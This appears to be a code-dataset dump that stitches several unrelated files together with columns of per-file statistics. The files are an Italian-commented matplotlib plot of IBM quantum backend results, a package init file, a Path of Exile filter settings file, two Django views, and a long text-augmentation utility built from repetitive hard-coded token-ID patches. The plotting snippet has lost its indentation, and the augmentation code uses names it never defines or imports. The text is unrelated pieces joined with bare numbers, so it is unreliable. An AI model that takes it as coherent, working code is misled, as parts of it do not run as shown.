sfasamento2 = [0, 0, 0, 0, 0]
sfasamento3 = [0.1, 0.1, 0.1, 0.1, 0.1]
ax.axvspan(0.8, 1.2, alpha=0.2) # Serve a colorare una certa area
ax.axvspan(1.8, 2.2, alpha=0.2)
ax.axvspan(2.8, 3.2, alpha=0.2)
ax.axvspan(3.8, 4.2, alpha=0.2)
ax.axvspan(4.8, 5.2, alpha=0.2)
# Santiago, |-> test
x = [1,2,3,4,5]
y = [2,3,2.02,1,3]
yerr = np.sqrt(100)
for k in range(5):
x[k] = x[k] + sfasamento1[k]
ax.plot(x, y, "b-.", label="ibmq_santiago")
plt.errorbar(x, y, yerr=yerr, fmt="bo")
# Vigo, |-> test
x = [1,2,3,4,5]
y = [12,3,4.04,5,5]
yerr = np.sqrt(100)
for k in range(5):
x[k] = x[k] + sfasamento2[k]
ax.plot(x, y, "g-.", label="ibmq_vigo")
plt.errorbar(x, y, yerr=yerr, fmt="go")
# Yorktown, |-> test
x = [1,2,3,4,5]
y = [8,4,29.29,28,21]
yerr = np.sqrt(100)
for k in range(5):
x[k] = x[k] + sfasamento3[k]
ax.plot(x, y, "r-.", label="ibmq_5_yorktown")
plt.errorbar(x, y, yerr=yerr, fmt="ro")
x0 = [0.5,5.5]
y0 = [0,0]
plt.plot(x0, y0, "c:", label="Ideal case (no noise)", linewidth=2)
plt.legend()
plt.show()
| 25.912935
| 149
| 0.544783
| 1,807
| 10,417
| 3.1057
| 0.086884
| 0.01283
| 0.016037
| 0.021383
| 0.898076
| 0.89469
| 0.883999
| 0.883999
| 0.878831
| 0.846757
| 0
| 0.085363
| 0.140827
| 10,417
| 401
| 150
| 25.977556
| 0.541676
| 0.090045
| 0
| 0.808219
| 0
| 0
| 0.143677
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006849
| false
| 0
| 0.020548
| 0
| 0.027397
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
408d3d4b9d2f68bc4d98b1ed58a6878bf1665658
| 176
|
py
|
Python
|
multidomain_sentiment/__init__.py
|
koreyou/multidomain-sentiment
|
766afdb839483c38a141c8d1d60c6faa75bd2684
|
[
"CC0-1.0"
] | null | null | null |
multidomain_sentiment/__init__.py
|
koreyou/multidomain-sentiment
|
766afdb839483c38a141c8d1d60c6faa75bd2684
|
[
"CC0-1.0"
] | null | null | null |
multidomain_sentiment/__init__.py
|
koreyou/multidomain-sentiment
|
766afdb839483c38a141c8d1d60c6faa75bd2684
|
[
"CC0-1.0"
] | null | null | null |
from multidomain_sentiment import dataset
from multidomain_sentiment import word_embedding
from multidomain_sentiment import models
from multidomain_sentiment import training
| 29.333333
| 48
| 0.903409
| 21
| 176
| 7.333333
| 0.428571
| 0.38961
| 0.623377
| 0.779221
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096591
| 176
| 5
| 49
| 35.2
| 0.968553
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
40ee90f189b88eabf871ba64016a2b522ac67f93
| 1,570
|
py
|
Python
|
autogen/custom_ex_shard_recipe.py
|
xanthics/poe_filter
|
d01bc823f97e247ebdf2921b86b720e2b6edc673
|
[
"MIT"
] | 4
|
2016-05-03T17:49:13.000Z
|
2019-03-30T03:22:40.000Z
|
autogen/custom_ex_shard_recipe.py
|
xanthics/poe_filter
|
d01bc823f97e247ebdf2921b86b720e2b6edc673
|
[
"MIT"
] | 2
|
2016-05-03T09:07:52.000Z
|
2018-12-24T08:47:12.000Z
|
autogen/custom_ex_shard_recipe.py
|
xanthics/poe_filter
|
d01bc823f97e247ebdf2921b86b720e2b6edc673
|
[
"MIT"
] | 1
|
2018-11-21T15:54:08.000Z
|
2018-11-21T15:54:08.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Created: 02/07/2022(m/d/y) 16:44:11 UTC from "Archnemesis" data
desc = "Ex Shard Autogen"
# Base type : settings pair
items = {
'0 Amulet': {'class': 'Amulet', 'other': ['HasInfluence Crusader Elder Hunter Redeemer Shaper Warlord', 'Rarity Rare', 'Identified False'], 'type': 'recipe item rare'},
'0 Belt': {'class': 'Belt', 'other': ['HasInfluence Crusader Elder Hunter Redeemer Shaper Warlord', 'Rarity Rare', 'Identified False'], 'type': 'recipe item rare'},
'0 Body Armour': {'class': 'Body Armour', 'other': ['HasInfluence Crusader Elder Hunter Redeemer Shaper Warlord', 'Rarity Rare', 'Identified False'], 'type': 'recipe item rare'},
'0 Boots': {'class': 'Boots', 'other': ['HasInfluence Crusader Elder Hunter Redeemer Shaper Warlord', 'Rarity Rare', 'Identified False'], 'type': 'recipe item rare'},
'0 Gloves': {'class': 'Gloves', 'other': ['HasInfluence Crusader Elder Hunter Redeemer Shaper Warlord', 'Rarity Rare', 'Identified False'], 'type': 'recipe item rare'},
'0 Helmet': {'class': 'Helmet', 'other': ['HasInfluence Crusader Elder Hunter Redeemer Shaper Warlord', 'Rarity Rare', 'Identified False'], 'type': 'recipe item rare'},
'0 Ring': {'class': 'Ring', 'other': ['HasInfluence Crusader Elder Hunter Redeemer Shaper Warlord', 'Rarity Rare', 'Identified False'], 'type': 'recipe item rare'},
'0 Two Hand" "Staves" "Bow': {'class': 'Two Hand" "Staves" "Bow', 'other': ['HasInfluence Crusader Elder Hunter Redeemer Shaper Warlord', 'Rarity Rare', 'Identified False'], 'type': 'recipe item rare'},
}
| 87.222222
| 203
| 0.683439
| 197
| 1,570
| 5.446701
| 0.28934
| 0.126747
| 0.186393
| 0.223672
| 0.752097
| 0.752097
| 0.752097
| 0.752097
| 0.752097
| 0.752097
| 0
| 0.016875
| 0.131847
| 1,570
| 17
| 204
| 92.352941
| 0.77036
| 0.081529
| 0
| 0
| 1
| 0
| 0.752434
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
909fa8f9976516d4e3ffe7ad64792305b3bdde14
| 164
|
py
|
Python
|
jsi/views.py
|
lqez/just-sort-it
|
779709254a38afc029bd1e8410ee30b3f0665715
|
[
"MIT"
] | null | null | null |
jsi/views.py
|
lqez/just-sort-it
|
779709254a38afc029bd1e8410ee30b3f0665715
|
[
"MIT"
] | null | null | null |
jsi/views.py
|
lqez/just-sort-it
|
779709254a38afc029bd1e8410ee30b3f0665715
|
[
"MIT"
] | null | null | null |
from django.http import HttpResponse
def welcome(request):
return HttpResponse('welcome page')
def webhook(request):
return HttpResponse('webhook page')
| 18.222222
| 39
| 0.756098
| 19
| 164
| 6.526316
| 0.578947
| 0.209677
| 0.403226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152439
| 164
| 8
| 40
| 20.5
| 0.892086
| 0
| 0
| 0
| 0
| 0
| 0.146341
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
90abd3953de1ce6ec2a4643428572260fa30674e
| 43,404
|
py
|
Python
|
code/transformers/src/transformers/data/augmentation_utils.py
|
lingo-mit/transformers
|
478fb18a9f9680321f0d37dc999ea444e9287cc0
|
[
"Apache-2.0"
] | null | null | null |
code/transformers/src/transformers/data/augmentation_utils.py
|
lingo-mit/transformers
|
478fb18a9f9680321f0d37dc999ea444e9287cc0
|
[
"Apache-2.0"
] | null | null | null |
code/transformers/src/transformers/data/augmentation_utils.py
|
lingo-mit/transformers
|
478fb18a9f9680321f0d37dc999ea444e9287cc0
|
[
"Apache-2.0"
] | null | null | null |
def convert_to_tokens(text, tokenizer, add_space=True):
tokens = []
current_token = ""
for i in range(len(text)):
if text[i].isspace() and set(current_token) != {" "}:
if current_token:
tokens.append(current_token)
current_token = ""
if text[i] == " ":
current_token = " "
else:
tokens.append(text[i])
else:
current_token += text[i]
if current_token:
tokens.append(current_token)
if add_space:
if not tokens[0][0].isspace() and len(tokenizer.tokenize(tokens[0])) == len(tokenizer.tokenize(" " + tokens[0])):
tokens[0] = " " + tokens[0]
return tokens
ALPHABETS = "([A-Za-z])"
PREFIXES = re.compile("(Mr|St|Mrs|Ms|Dr|Prof|Capt|Cpt|Lt|Mt)[.]")
SUFFIXES = "(Inc|Ltd|Jr|Sr|Co)"
STARTERS = "(Mr|Mrs|Ms|Dr|He\s|She\s|It\s|They\s|Their\s|Our\s|We\s|But\s|However\s|That\s|This\s|Wherever)"
ACRONYMS = "([A-Z][.][A-Z][.](?:[A-Z][.])?)"
WEBSITES = re.compile("[.](com|net|org|io|gov|sj|bv|edu|ae)")
DIGITS = "([0-9])"
ALPHABETS_1 = re.compile("\s" + ALPHABETS + "[.] ")
ALPHABETS_2 = re.compile(ALPHABETS + "[.]" + ALPHABETS + "[.]" + ALPHABETS + "[.]")
ALPHABETS_3 = re.compile(ALPHABETS + "[.]" + ALPHABETS + "[.]")
ALPHABETS_4 = re.compile(" " + ALPHABETS + "[.]")
ACRONYMS_1 = re.compile(ACRONYMS + " " + STARTERS)
SUFFIXES_1 = re.compile(" " + SUFFIXES + "[.] " + STARTERS)
SUFFIXES_2 = re.compile(" " + SUFFIXES + "[.]")
DIGITS_1 = re.compile("[.]" + DIGITS)
ENUMERATION_1 = re.compile("( [A-Za-z0-9] )" + "[.]")
ENUMERATION_2 = re.compile("([A-Za-z0-9])" + "[.]" + "([A-Za-z0-9]+)")
def convert_to_sentences(text, tokenizer):
"Adapted from https://stackoverflow.com/a/31505798"
first_word = ""
for c in text:
if c.isspace():
break
first_word += c
if text[0] in ("'", "-") or first_word and len(tokenizer.tokenize(first_word)) != len(tokenizer.tokenize("." + first_word)) - 1:
text = " " + text
text = re.sub(PREFIXES, "\\1<prd>", text)
text = re.sub(WEBSITES, "<prd>\\1", text)
if "Ph.D" in text: text = text.replace("Ph.D.", "Ph<prd>D<prd>")
text = re.sub(ALPHABETS_1," \\1<prd> ", text)
text = re.sub(ACRONYMS_1, "\\1<stop> \\2", text)
text = re.sub(ALPHABETS_2, "\\1<prd>\\2<prd>\\3<prd>", text)
text = re.sub(ALPHABETS_3, "\\1<prd>\\2<prd>", text)
text = re.sub(SUFFIXES_1, " \\1<prd><stop> \\2", text)
text = re.sub(SUFFIXES_2, " \\1<prd>", text)
text = re.sub(ALPHABETS_4, " \\1<prd>", text)
text = re.sub(DIGITS_1, "<prd>\\1", text)
text = re.sub(ENUMERATION_1, "\\1<prd>", text)
text = re.sub(ENUMERATION_2, "\\1<prd>\\2", text)
text = text.replace(".....", "<prd><prd><prd><prd><prd>")
text = text.replace("...", "<prd><prd><prd>")
text = text.replace(".. ?", "<prd><prd> <qmark>")
text = text.replace(".-", "<prd>-")
text = text.replace("..", "<prd>.")
text = text.replace(".@", "<prd>@")
if "”" in text: text = text.replace(".”", "”.")
if "\"" in text: text = text.replace(".\"", "\".")
if "!" in text: text = text.replace("!\"", "\"!")
if "?" in text: text = text.replace("?\"", "\"?")
if "'" in text: text = text.replace(".'", "'.")
if ".ep" in text: text = re.sub("[.](ep \d+)( , ep \d+)*", "<prd>\\1\\2<stop>", text)
text = text.replace(".", ".<stop>")
text = text.replace("?", "?<stop>")
text = text.replace("!", "!<stop>")
text = text.replace("<prd>", ".")
text = text.replace("<qmark>", "?")
sentences = text.split("<stop>")
for i in range(len(sentences)):
if "”" in sentences[i]: sentences[i] = sentences[i].replace("”.", ".”")
if "\"" in sentences[i]: sentences[i] = sentences[i].replace("\".", ".\"")
if "!" in sentences[i]: sentences[i] = sentences[i].replace("\"!", "!\"")
if "?" in sentences[i]: sentences[i] = sentences[i].replace("\"?", "?\"")
if "'" in sentences[i]: sentences[i] = sentences[i].replace("'.", ".'")
return sentences
def safe_string_get(s, i, ):
try:
return s[i]
except IndexError:
return False
def divide_into_sections(tokenized_text, tokenizer, section_length):
if (len(tokenizer.decode(tokenized_text[section_length - 1:section_length + 2])) == 1 or
len(tokenizer.decode(tokenized_text[section_length - 1:section_length + 2])) == 2 and
tokenizer.decode(tokenized_text[section_length - 1:section_length + 2])[0].isspace()):
first_part_tokens = tokenized_text[:section_length + 2]
second_part_tokens = tokenized_text[section_length + 2:]
elif (len(tokenizer.decode(tokenized_text[section_length - 2:section_length + 1])) == 1 or
len(tokenizer.decode(tokenized_text[section_length - 2:section_length + 1])) == 2 and
tokenizer.decode(tokenized_text[section_length - 2:section_length + 1])[0].isspace()):
first_part_tokens = tokenized_text[:section_length + 1]
second_part_tokens = tokenized_text[section_length + 1:]
elif len(tokenizer.decode(tokenized_text[section_length - 1:section_length + 1])) == 1:
first_part_tokens = tokenized_text[:section_length + 1]
second_part_tokens = tokenized_text[section_length + 1:]
else:
first_part_tokens = tokenized_text[:section_length]
second_part_tokens = tokenized_text[section_length:]
return first_part_tokens, second_part_tokens
def divide_into_sections_fill(tokenized_text, tokenizer, section_length):
index = len(tokenized_text) - section_length
if (len(tokenizer.decode(tokenized_text[index - 1:index + 2])) == 1 or
len(tokenizer.decode(tokenized_text[index - 1:index + 2])) == 2 and
tokenizer.decode(tokenized_text[index - 1:index + 2])[0].isspace()):
first_part_tokens = tokenized_text[:index + 2]
second_part_tokens = tokenized_text[index + 2:]
elif (len(tokenizer.decode(tokenized_text[index - 2:index + 1])) == 1 or
len(tokenizer.decode(tokenized_text[index - 2:index + 1])) == 2 and
tokenizer.decode(tokenized_text[index - 2:index + 1])[0].isspace()):
first_part_tokens = tokenized_text[:index + 1]
second_part_tokens = tokenized_text[index + 1:]
elif len(tokenizer.decode(tokenized_text[index - 1:index + 1])) == 1:
first_part_tokens = tokenized_text[:index + 1]
second_part_tokens = tokenized_text[index + 1:]
else:
first_part_tokens = tokenized_text[:index]
second_part_tokens = tokenized_text[index:]
return first_part_tokens, second_part_tokens
def check_tokenization(tokenized_text, tokenized_augmented_text, tokenizer, augmentation_function, size=None):
# if len(tokenized_augmented_text) > len(tokenized_text) and tokenizer.convert_tokens_to_ids(tokenizer.tokenize("<|endofaugmentedtext|>"))[0] in tokenized_augmented_text:
if (augmentation_function not in PADDED_FUNCTIONS and
augmentation_function not in REPLACE_FUNCTIONS and
tokenizer.convert_tokens_to_ids(tokenizer.tokenize("<|endofaugmentedtext|>"))[0] in tokenized_augmented_text):
# print(tokenized_augmented_text)
# pass
tokenized_augmented_text = tokenized_augmented_text[1:]
# print(tokenized_text[:6])
# if tokenized_text[:6] == [118, 94, 782, 2540, 284, 37890]:
# print("FIRST TOKEN: \n\n\n\n\n\n\\n\n\n\n\n\n\n\n\n\n\n\n\n", tokenized_augmented_text[0])
if augmentation_function in PADDED_FUNCTIONS:
padding_token = tokenizer.convert_tokens_to_ids(tokenizer.tokenize("<|paddingtoken|>"))
while len(tokenized_augmented_text) < len(tokenized_text):
tokenized_augmented_text = padding_token + tokenized_augmented_text
if augmentation_function in FILL_FUNCTIONS:
padding_token = tokenizer.convert_tokens_to_ids(tokenizer.tokenize("<|paddingtoken|>"))
if len(tokenized_augmented_text) < size:
print("TOO SHORT")
while len(tokenized_augmented_text) < len(tokenized_text):
tokenized_augmented_text = padding_token + tokenized_augmented_text
if size == 1536:
tokenized_augmented_text = tokenized_augmented_text[-1536:]
elif size == 1024:
tokenized_augmented_text = tokenized_augmented_text[-1024:]
else:
raise ValueError("invalid augmentation function")
return tokenized_augmented_text
if augmentation_function in REPLACE_FUNCTIONS:
debug = False
if tokenized_text[0] == 8244:
debug = True
# print(len(tokenized_text))
# print(len(tokenized_augmented_text))
# print(tokenized_text)
# print(tokenized_augmented_text)
# assert False
replacement_token = tokenizer.convert_tokens_to_ids(tokenizer.tokenize("<|replacement|>"))
end_of_augmented_text_token = tokenizer.convert_tokens_to_ids(tokenizer.tokenize("<|endofaugmentedtext|>"))[0]
i, j = 0, 0
while i < len(tokenized_text) and j < len(tokenized_text):
# if debug:
# print(tokenized_augmented_text[j], tokenized_text[i])
if tokenized_augmented_text[j] == end_of_augmented_text_token and tokenizer.decode(tokenized_augmented_text[j+1]).strip() == tokenizer.decode(tokenized_text[i]).strip() and j >= 512:
if tokenizer.decode(tokenized_augmented_text[j+1]).strip() == "":
if tokenized_augmented_text[j+1] == tokenized_text[i]:
break
else:
break
# tokenized_augmented_text = tokenized_augmented_text[:j] + replacement_token + tokenized_augmented_text[j:]
# i += 1
# j += 1
# continue
if tokenizer.decode(tokenized_text[i]).strip() != tokenizer.decode(tokenized_augmented_text[j]).strip():
tokenized_augmented_text = tokenized_augmented_text[:j] + replacement_token + tokenized_augmented_text[j:]
i += 1
j += 1
tokenized_augmented_text = tokenized_augmented_text[1:]
# print(len(tokenized_text))
if len(tokenized_augmented_text) != len(tokenized_text):
# print(find_difference(tokenized_text, tokenized_augmented_text))
# pass
tokenized_augmented_text = fix_tokenization(tokenized_text, tokenized_augmented_text, tokenizer, augmentation_function)
if len(tokenized_text) == len(tokenized_augmented_text):
# print(len(tokenized_text))
# print(len(tokenized_augmented_text))
# print(tokenized_text)
# print(tokenized_augmented_text)
# assert False
return tokenized_augmented_text
else:
return tokenized_augmented_text
# print(len(tokenized_text))
# print(len(tokenized_augmented_text))
# print(tokenized_text)
# print(tokenized_augmented_text)
# assert False
# return False
def fix_tokenization(tokenized_text, tokenized_augmented_text, tokenizer, augmentation_function):
if len(tokenized_text) > len(tokenized_augmented_text):
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 2343 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [2343, 226] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 16268 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [16268, 249] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 19567 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 19567] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 10545 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [10545, 246] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 136 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 136] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 28053 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [28053, 120] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 133 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 133] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 156 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 156] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 27332 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [27332, 119] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 132 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 132] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 20015 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 20015] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 10263 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [10263, 227] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 134 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 134] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 130 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 130] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 27670 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 27670] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 5099 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 5099] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 26292 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 26292] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 142 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 142] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 157 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [157, 118] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 156 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [156, 106] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 34247 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 34247] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 161 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [161, 254] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 165 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [165, 253] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 162 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [162, 249] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 115 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [115, 253] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 163 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [163, 114] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 169 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [169, 247] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 164 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [164, 111] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 98 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [98, 232] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 119 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [119, 229] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 224 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [224, 117] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 223 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [223, 226] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 99 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [99, 236] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 235 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [235, 119] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 115 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [115, 243] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 120 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [120, 242] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 252 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [252, 234] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 122 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [122, 110] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 253 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [253, 111] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 102 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [102, 109] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 226 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [226, 244] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 118 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [118, 96] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 225 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [225, 254] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 233 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [233, 227] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 123 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [123, 114] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 247 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [247, 101] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 255 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [255, 96] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 112 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [112, 108] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(1828) > tokenized_text.count(1828) and 17 in tokenized_text:
index = tokenized_augmented_text.index(1828)
tokenized_augmented_text = tokenized_augmented_text[:index] + [17, 17] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(10332) > tokenized_text.count(10332) and 519 in tokenized_text:
index = tokenized_augmented_text.index(10332)
